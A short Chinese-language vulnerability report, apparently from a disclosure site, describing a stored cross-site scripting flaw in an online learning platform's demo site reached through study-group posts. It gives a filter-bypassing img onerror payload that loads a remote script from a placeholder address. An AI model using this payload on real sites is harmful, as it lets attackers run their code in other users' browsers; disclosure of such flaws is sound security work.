### 简要描述:
学习,就得慢慢来。
### 详细说明:
就拿官方的在线Demo网站来做演示.
### 漏洞证明:
首先,注册账号。
注册以后,可以在网站上任意找到一个 学习小组
路径:
http://**.**.**.**/group
热门小组啊,人好多的有木有?
[<img src="https://images.seebug.org/upload/201511/06095315de0a565a9e58cd45f0011de17a01ade1.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/06095315de0a565a9e58cd45f0011de17a01ade1.png)
点击加入该小组,
然后就可以发帖了。哦也!
发帖内文中,居然可以看源码。好开心。。。
上xss代码。
一般的 <script> 神马的都被撸了。
想办法吧!
创建节点,然后写js内容吧
```
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
```
[<img src="https://images.seebug.org/upload/201511/06095525db983e9633b35e5761ab1086c16b7e8c.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/06095525db983e9633b35e5761ab1086c16b7e8c.png)
京公网安备 11010502034610号
暂无评论